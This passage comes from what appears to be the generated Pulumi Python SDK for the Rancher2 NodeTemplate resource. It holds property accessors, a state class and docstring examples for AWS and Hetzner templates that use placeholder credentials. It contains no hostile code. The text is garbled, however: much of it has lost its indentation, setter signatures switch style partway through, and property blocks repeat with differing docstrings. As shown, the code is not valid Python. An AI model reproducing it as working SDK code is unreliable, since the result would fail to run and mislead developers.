        pulumi.set(self, "engine_label", value)

    @property
    @pulumi.getter(name="engineOpt")
    def engine_opt(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Engine options for the node template (map)
        """
        return pulumi.get(self, "engine_opt")

    @engine_opt.setter
    def engine_opt(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "engine_opt", value)

    @property
    @pulumi.getter(name="engineRegistryMirrors")
    def engine_registry_mirrors(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Engine registry mirror for the node template (list)
        """
        return pulumi.get(self, "engine_registry_mirrors")

    @engine_registry_mirrors.setter
    def engine_registry_mirrors(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "engine_registry_mirrors", value)

    @property
    @pulumi.getter(name="engineStorageDriver")
    def engine_storage_driver(self) -> Optional[pulumi.Input[str]]:
        """
        Engine storage driver for the node template (string)
        """
        return pulumi.get(self, "engine_storage_driver")

    @engine_storage_driver.setter
    def engine_storage_driver(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "engine_storage_driver", value)

    @property
    @pulumi.getter(name="hetznerConfig")
    def hetzner_config(self) -> Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']]:
        """
        Hetzner config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "hetzner_config")

    @hetzner_config.setter
    def hetzner_config(self, value: Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']]):
        pulumi.set(self, "hetzner_config", value)

    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Labels for Node Template object (map)
        """
        return pulumi.get(self, "labels")

    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "labels", value)

    @property
    @pulumi.getter(name="linodeConfig")
    def linode_config(self) -> Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']]:
        """
        Linode config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "linode_config")

    @linode_config.setter
    def linode_config(self, value: Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']]):
        pulumi.set(self, "linode_config", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Node Template (string)
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="nodeTaints")
    def node_taints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]]:
        """
        Node taints. For Rancher v2.3.3 or above (List)
        """
        return pulumi.get(self, "node_taints")

    @node_taints.setter
    def node_taints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]]):
        pulumi.set(self, "node_taints", value)

    @property
    @pulumi.getter(name="opennebulaConfig")
    def opennebula_config(self) -> Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']]:
        """
        Opennebula config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "opennebula_config")

    @opennebula_config.setter
    def opennebula_config(self, value: Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']]):
        pulumi.set(self, "opennebula_config", value)

    @property
    @pulumi.getter(name="openstackConfig")
    def openstack_config(self) -> Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']]:
        """
        Openstack config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "openstack_config")

    @openstack_config.setter
    def openstack_config(self, value: Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']]):
        pulumi.set(self, "openstack_config", value)

    # NOTE(review): upstream generated docs described this field as
    # "Engine storage driver", which looks like a copy/paste error; the
    # parameter name indicates it toggles use of the internal IP address.
    @property
    @pulumi.getter(name="useInternalIpAddress")
    def use_internal_ip_address(self) -> Optional[pulumi.Input[bool]]:
        """
        Use internal IP address for the node template (bool)
        """
        return pulumi.get(self, "use_internal_ip_address")

    @use_internal_ip_address.setter
    def use_internal_ip_address(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "use_internal_ip_address", value)

    @property
    @pulumi.getter(name="vsphereConfig")
    def vsphere_config(self) -> Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']]:
        """
        vSphere config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "vsphere_config")

    @vsphere_config.setter
    def vsphere_config(self, value: Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']]):
        pulumi.set(self, "vsphere_config", value)
@pulumi.input_type
class _NodeTemplateState:
def __init__(__self__, *,
amazonec2_config: Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input['NodeTemplateAzureConfigArgs']] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']] = None,
driver: Optional[pulumi.Input[str]] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]] = None,
opennebula_config: Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']] = None,
openstack_config: Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']] = None):
"""
Input properties used for looking up and filtering NodeTemplate resources.
:param pulumi.Input['NodeTemplateAmazonec2ConfigArgs'] amazonec2_config: AWS config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations for Node Template object (map)
:param pulumi.Input[str] auth_certificate_authority: Auth certificate authority for the Node Template (string)
:param pulumi.Input[str] auth_key: Auth key for the Node Template (string)
:param pulumi.Input['NodeTemplateAzureConfigArgs'] azure_config: Azure config for the Node Template (list maxitems:1)
:param pulumi.Input[str] cloud_credential_id: Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
:param pulumi.Input[str] description: Description for the Node Template (string)
:param pulumi.Input['NodeTemplateDigitaloceanConfigArgs'] digitalocean_config: Digitalocean config for the Node Template (list maxitems:1)
:param pulumi.Input[str] driver: (Computed) The driver of the node template (string)
:param pulumi.Input[str] driver_id: The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
:param pulumi.Input[Mapping[str, Any]] engine_env: Engine environment for the node template (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_insecure_registries: Insecure registry for the node template (list)
:param pulumi.Input[str] engine_install_url: Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
:param pulumi.Input[Mapping[str, Any]] engine_label: Engine label for the node template (string)
:param pulumi.Input[Mapping[str, Any]] engine_opt: Engine options for the node template (map)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_registry_mirrors: Engine registry mirror for the node template (list)
:param pulumi.Input[str] engine_storage_driver: Engine storage driver for the node template (string)
:param pulumi.Input['NodeTemplateHetznerConfigArgs'] hetzner_config: Hetzner config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] labels: Labels for Node Template object (map)
:param pulumi.Input['NodeTemplateLinodeConfigArgs'] linode_config: Linode config for the Node Template (list maxitems:1)
:param pulumi.Input[str] name: The name of the Node Template (string)
:param pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]] node_taints: Node taints. For Rancher v2.3.3 or above (List)
:param pulumi.Input['NodeTemplateOpennebulaConfigArgs'] opennebula_config: Opennebula config for the Node Template (list maxitems:1)
:param pulumi.Input['NodeTemplateOpenstackConfigArgs'] openstack_config: Openstack config for the Node Template (list maxitems:1)
:param pulumi.Input[bool] use_internal_ip_address: Engine storage driver for the node template (bool)
:param pulumi.Input['NodeTemplateVsphereConfigArgs'] vsphere_config: vSphere config for the Node Template (list maxitems:1)
"""
if amazonec2_config is not None:
pulumi.set(__self__, "amazonec2_config", amazonec2_config)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if auth_certificate_authority is not None:
pulumi.set(__self__, "auth_certificate_authority", auth_certificate_authority)
if auth_key is not None:
pulumi.set(__self__, "auth_key", auth_key)
if azure_config is not None:
pulumi.set(__self__, "azure_config", azure_config)
if cloud_credential_id is not None:
pulumi.set(__self__, "cloud_credential_id", cloud_credential_id)
if description is not None:
pulumi.set(__self__, "description", description)
if digitalocean_config is not None:
pulumi.set(__self__, "digitalocean_config", digitalocean_config)
if driver is not None:
pulumi.set(__self__, "driver", driver)
if driver_id is not None:
pulumi.set(__self__, "driver_id", driver_id)
if engine_env is not None:
pulumi.set(__self__, "engine_env", engine_env)
if engine_insecure_registries is not None:
pulumi.set(__self__, "engine_insecure_registries", engine_insecure_registries)
if engine_install_url is not None:
pulumi.set(__self__, "engine_install_url", engine_install_url)
if engine_label is not None:
pulumi.set(__self__, "engine_label", engine_label)
if engine_opt is not None:
pulumi.set(__self__, "engine_opt", engine_opt)
if engine_registry_mirrors is not None:
pulumi.set(__self__, "engine_registry_mirrors", engine_registry_mirrors)
if engine_storage_driver is not None:
pulumi.set(__self__, "engine_storage_driver", engine_storage_driver)
if hetzner_config is not None:
pulumi.set(__self__, "hetzner_config", hetzner_config)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if linode_config is not None:
pulumi.set(__self__, "linode_config", linode_config)
if name is not None:
pulumi.set(__self__, "name", name)
if node_taints is not None:
pulumi.set(__self__, "node_taints", node_taints)
if opennebula_config is not None:
pulumi.set(__self__, "opennebula_config", opennebula_config)
if openstack_config is not None:
pulumi.set(__self__, "openstack_config", openstack_config)
if use_internal_ip_address is not None:
pulumi.set(__self__, "use_internal_ip_address", use_internal_ip_address)
if vsphere_config is not None:
pulumi.set(__self__, "vsphere_config", vsphere_config)
@property
@pulumi.getter(name="amazonec2Config")
def amazonec2_config(self) -> Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']]:
"""
AWS config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "amazonec2_config")
@amazonec2_config.setter
def amazonec2_config(self, value: Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']]):
pulumi.set(self, "amazonec2_config", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Annotations for Node Template object (map)
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authCertificateAuthority")
def auth_certificate_authority(self) -> Optional[pulumi.Input[str]]:
"""
Auth certificate authority for the Node Template (string)
"""
return pulumi.get(self, "auth_certificate_authority")
@auth_certificate_authority.setter
def auth_certificate_authority(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auth_certificate_authority", value)
@property
@pulumi.getter(name="authKey")
def auth_key(self) -> Optional[pulumi.Input[str]]:
"""
Auth key for the Node Template (string)
"""
return pulumi.get(self, "auth_key")
@auth_key.setter
def auth_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auth_key", value)
@property
@pulumi.getter(name="azureConfig")
def azure_config(self) -> Optional[pulumi.Input['NodeTemplateAzureConfigArgs']]:
"""
Azure config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "azure_config")
@azure_config.setter
def azure_config(self, value: Optional[pulumi.Input['NodeTemplateAzureConfigArgs']]):
pulumi.set(self, "azure_config", value)
@property
@pulumi.getter(name="cloudCredentialId")
def cloud_credential_id(self) -> Optional[pulumi.Input[str]]:
"""
Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
"""
return pulumi.get(self, "cloud_credential_id")
@cloud_credential_id.setter
def cloud_credential_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cloud_credential_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description for the Node Template (string)
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="digitaloceanConfig")
def digitalocean_config(self) -> Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']]:
"""
Digitalocean config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "digitalocean_config")
@digitalocean_config.setter
def digitalocean_config(self, value: Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']]):
pulumi.set(self, "digitalocean_config", value)
@property
@pulumi.getter
def driver(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The driver of the node template (string)
"""
return pulumi.get(self, "driver")
@driver.setter
def driver(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver", value)
@property
@pulumi.getter(name="driverId")
def driver_id(self) -> Optional[pulumi.Input[str]]:
"""
The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
"""
return pulumi.get(self, "driver_id")
@driver_id.setter
def driver_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_id", value)
@property
@pulumi.getter(name="engineEnv")
def engine_env(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Engine environment for the node template (string)
"""
return pulumi.get(self, "engine_env")
@engine_env.setter
def engine_env(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "engine_env", value)
    @property
    @pulumi.getter(name="engineInsecureRegistries")
    def engine_insecure_registries(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Insecure registry for the node template (list)
        """
        return pulumi.get(self, "engine_insecure_registries")
    @engine_insecure_registries.setter
    def engine_insecure_registries(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]) -> None:
        pulumi.set(self, "engine_insecure_registries", value)
    @property
    @pulumi.getter(name="engineInstallUrl")
    def engine_install_url(self) -> Optional[pulumi.Input[str]]:
        """
        Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
        """
        return pulumi.get(self, "engine_install_url")
    @engine_install_url.setter
    def engine_install_url(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "engine_install_url", value)
    @property
    @pulumi.getter(name="engineLabel")
    def engine_label(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Engine label for the node template (map)
        """
        return pulumi.get(self, "engine_label")
    @engine_label.setter
    def engine_label(self, value: Optional[pulumi.Input[Mapping[str, Any]]]) -> None:
        pulumi.set(self, "engine_label", value)
    @property
    @pulumi.getter(name="engineOpt")
    def engine_opt(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Engine options for the node template (map)
        """
        return pulumi.get(self, "engine_opt")
    @engine_opt.setter
    def engine_opt(self, value: Optional[pulumi.Input[Mapping[str, Any]]]) -> None:
        pulumi.set(self, "engine_opt", value)
    @property
    @pulumi.getter(name="engineRegistryMirrors")
    def engine_registry_mirrors(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Engine registry mirror for the node template (list)
        """
        return pulumi.get(self, "engine_registry_mirrors")
    @engine_registry_mirrors.setter
    def engine_registry_mirrors(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]) -> None:
        pulumi.set(self, "engine_registry_mirrors", value)
    @property
    @pulumi.getter(name="engineStorageDriver")
    def engine_storage_driver(self) -> Optional[pulumi.Input[str]]:
        """
        Engine storage driver for the node template (string)
        """
        return pulumi.get(self, "engine_storage_driver")
    @engine_storage_driver.setter
    def engine_storage_driver(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "engine_storage_driver", value)
    @property
    @pulumi.getter(name="hetznerConfig")
    def hetzner_config(self) -> Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']]:
        """
        Hetzner config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "hetzner_config")
    @hetzner_config.setter
    def hetzner_config(self, value: Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']]) -> None:
        pulumi.set(self, "hetzner_config", value)
    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Labels for Node Template object (map)
        """
        return pulumi.get(self, "labels")
    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]) -> None:
        pulumi.set(self, "labels", value)
    @property
    @pulumi.getter(name="linodeConfig")
    def linode_config(self) -> Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']]:
        """
        Linode config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "linode_config")
    @linode_config.setter
    def linode_config(self, value: Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']]) -> None:
        pulumi.set(self, "linode_config", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Node Template (string)
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="nodeTaints")
    def node_taints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]]:
        """
        Node taints. For Rancher v2.3.3 or above (List)
        """
        return pulumi.get(self, "node_taints")
    @node_taints.setter
    def node_taints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]]) -> None:
        pulumi.set(self, "node_taints", value)
    @property
    @pulumi.getter(name="opennebulaConfig")
    def opennebula_config(self) -> Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']]:
        """
        Opennebula config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "opennebula_config")
    @opennebula_config.setter
    def opennebula_config(self, value: Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']]) -> None:
        pulumi.set(self, "opennebula_config", value)
    @property
    @pulumi.getter(name="openstackConfig")
    def openstack_config(self) -> Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']]:
        """
        Openstack config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "openstack_config")
    @openstack_config.setter
    def openstack_config(self, value: Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']]) -> None:
        pulumi.set(self, "openstack_config", value)
    @property
    @pulumi.getter(name="useInternalIpAddress")
    def use_internal_ip_address(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to use the internal IP address of the node (bool)
        """
        return pulumi.get(self, "use_internal_ip_address")
    @use_internal_ip_address.setter
    def use_internal_ip_address(self, value: Optional[pulumi.Input[bool]]) -> None:
        pulumi.set(self, "use_internal_ip_address", value)
    @property
    @pulumi.getter(name="vsphereConfig")
    def vsphere_config(self) -> Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']]:
        """
        vSphere config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "vsphere_config")
    @vsphere_config.setter
    def vsphere_config(self, value: Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']]) -> None:
        pulumi.set(self, "vsphere_config", value)
class NodeTemplate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
amazonec2_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']]] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']]] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]]] = None,
opennebula_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']]] = None,
openstack_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']]] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']]] = None,
__props__=None):
"""
Provides a Rancher v2 Node Template resource. This can be used to create Node Template for Rancher v2 and retrieve their information.
amazonec2, azure, digitalocean, linode, opennebula, openstack, hetzner, and vsphere drivers are supported for node templates.
**Note** If you are upgrading to Rancher v2.3.3, please take a look to final section
## Example Usage
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template up to Rancher 2.1.x
foo = rancher2.NodeTemplate("foo",
amazonec2_config=rancher2.NodeTemplateAmazonec2ConfigArgs(
access_key="AWS_ACCESS_KEY",
ami="<AMI_ID>",
region="<REGION>",
secret_key="<AWS_SECRET_KEY>",
security_groups=["<AWS_SECURITY_GROUP>"],
subnet_id="<SUBNET_ID>",
vpc_id="<VPC_ID>",
zone="<ZONE>",
),
description="foo test")
```
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template from Rancher 2.2.x
foo_cloud_credential = rancher2.CloudCredential("fooCloudCredential",
description="foo test",
amazonec2_credential_config=rancher2.CloudCredentialAmazonec2CredentialConfigArgs(
access_key="<AWS_ACCESS_KEY>",
secret_key="<AWS_SECRET_KEY>",
))
foo_node_template = rancher2.NodeTemplate("fooNodeTemplate",
description="foo test",
cloud_credential_id=foo_cloud_credential.id,
amazonec2_config=rancher2.NodeTemplateAmazonec2ConfigArgs(
ami="<AMI_ID>",
region="<REGION>",
security_groups=["<AWS_SECURITY_GROUP>"],
subnet_id="<SUBNET_ID>",
vpc_id="<VPC_ID>",
zone="<ZONE>",
))
```
### Using the Hetzner Node Driver
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template using hetzner node_driver
hetzner_node_driver = rancher2.NodeDriver("hetznerNodeDriver",
active=True,
builtin=False,
ui_url="https://storage.googleapis.com/hcloud-rancher-v2-ui-driver/component.js",
url="https://github.com/JonasProgrammer/docker-machine-driver-hetzner/releases/download/3.0.0/docker-machine-driver-hetzner_3.0.0_linux_amd64.tar.gz",
whitelist_domains=["storage.googleapis.com"])
my_hetzner_node_template = rancher2.NodeTemplate("myHetznerNodeTemplate",
driver_id=hetzner_node_driver.id,
hetzner_config=rancher2.NodeTemplateHetznerConfigArgs(
api_token="XXXXXXXXXX",
image="ubuntu-18.04",
server_location="nbg1",
server_type="cx11",
))
```
## Import
Node Template can be imported using the Rancher Node Template ID
```sh
$ pulumi import rancher2:index/nodeTemplate:NodeTemplate foo <node_template_id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']] amazonec2_config: AWS config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations for Node Template object (map)
:param pulumi.Input[str] auth_certificate_authority: Auth certificate authority for the Node Template (string)
:param pulumi.Input[str] auth_key: Auth key for the Node Template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']] azure_config: Azure config for the Node Template (list maxitems:1)
:param pulumi.Input[str] cloud_credential_id: Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
:param pulumi.Input[str] description: Description for the Node Template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']] digitalocean_config: Digitalocean config for the Node Template (list maxitems:1)
:param pulumi.Input[str] driver_id: The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
:param pulumi.Input[Mapping[str, Any]] engine_env: Engine environment for the node template (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_insecure_registries: Insecure registry for the node template (list)
:param pulumi.Input[str] engine_install_url: Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
:param pulumi.Input[Mapping[str, Any]] engine_label: Engine label for the node template (string)
:param pulumi.Input[Mapping[str, Any]] engine_opt: Engine options for the node template (map)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_registry_mirrors: Engine registry mirror for the node template (list)
:param pulumi.Input[str] engine_storage_driver: Engine storage driver for the node template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']] hetzner_config: Hetzner config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] labels: Labels for Node Template object (map)
:param pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']] linode_config: Linode config for the Node Template (list maxitems:1)
:param pulumi.Input[str] name: The name of the Node Template (string)
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]] node_taints: Node taints. For Rancher v2.3.3 or above (List)
:param pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']] opennebula_config: Opennebula config for the Node Template (list maxitems:1)
:param pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']] openstack_config: Openstack config for the Node Template (list maxitems:1)
:param pulumi.Input[bool] use_internal_ip_address: Engine storage driver for the node template (bool)
:param pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']] vsphere_config: vSphere config for the Node Template (list maxitems:1)
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[NodeTemplateArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Rancher v2 Node Template resource. This can be used to create Node Template for Rancher v2 and retrieve their information.
amazonec2, azure, digitalocean, linode, opennebula, openstack, hetzner, and vsphere drivers are supported for node templates.
**Note** If you are upgrading to Rancher v2.3.3, please take a look to final section
## Example Usage
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template up to Rancher 2.1.x
foo = rancher2.NodeTemplate("foo",
amazonec2_config=rancher2.NodeTemplateAmazonec2ConfigArgs(
access_key="AWS_ACCESS_KEY",
ami="<AMI_ID>",
region="<REGION>",
secret_key="<AWS_SECRET_KEY>",
security_groups=["<AWS_SECURITY_GROUP>"],
subnet_id="<SUBNET_ID>",
vpc_id="<VPC_ID>",
zone="<ZONE>",
),
description="foo test")
```
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template from Rancher 2.2.x
foo_cloud_credential = rancher2.CloudCredential("fooCloudCredential",
description="foo test",
amazonec2_credential_config=rancher2.CloudCredentialAmazonec2CredentialConfigArgs(
access_key="<AWS_ACCESS_KEY>",
secret_key="<AWS_SECRET_KEY>",
))
foo_node_template = rancher2.NodeTemplate("fooNodeTemplate",
description="foo test",
cloud_credential_id=foo_cloud_credential.id,
amazonec2_config=rancher2.NodeTemplateAmazonec2ConfigArgs(
ami="<AMI_ID>",
region="<REGION>",
security_groups=["<AWS_SECURITY_GROUP>"],
subnet_id="<SUBNET_ID>",
vpc_id="<VPC_ID>",
zone="<ZONE>",
))
```
### Using the Hetzner Node Driver
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template using hetzner node_driver
hetzner_node_driver = rancher2.NodeDriver("hetznerNodeDriver",
active=True,
builtin=False,
ui_url="https://storage.googleapis.com/hcloud-rancher-v2-ui-driver/component.js",
url="https://github.com/JonasProgrammer/docker-machine-driver-hetzner/releases/download/3.0.0/docker-machine-driver-hetzner_3.0.0_linux_amd64.tar.gz",
whitelist_domains=["storage.googleapis.com"])
my_hetzner_node_template = rancher2.NodeTemplate("myHetznerNodeTemplate",
driver_id=hetzner_node_driver.id,
hetzner_config=rancher2.NodeTemplateHetznerConfigArgs(
api_token="XXXXXXXXXX",
image="ubuntu-18.04",
server_location="nbg1",
server_type="cx11",
))
```
## Import
Node Template can be imported using the Rancher Node Template ID
```sh
$ pulumi import rancher2:index/nodeTemplate:NodeTemplate foo <node_template_id>
```
:param str resource_name: The name of the resource.
:param NodeTemplateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
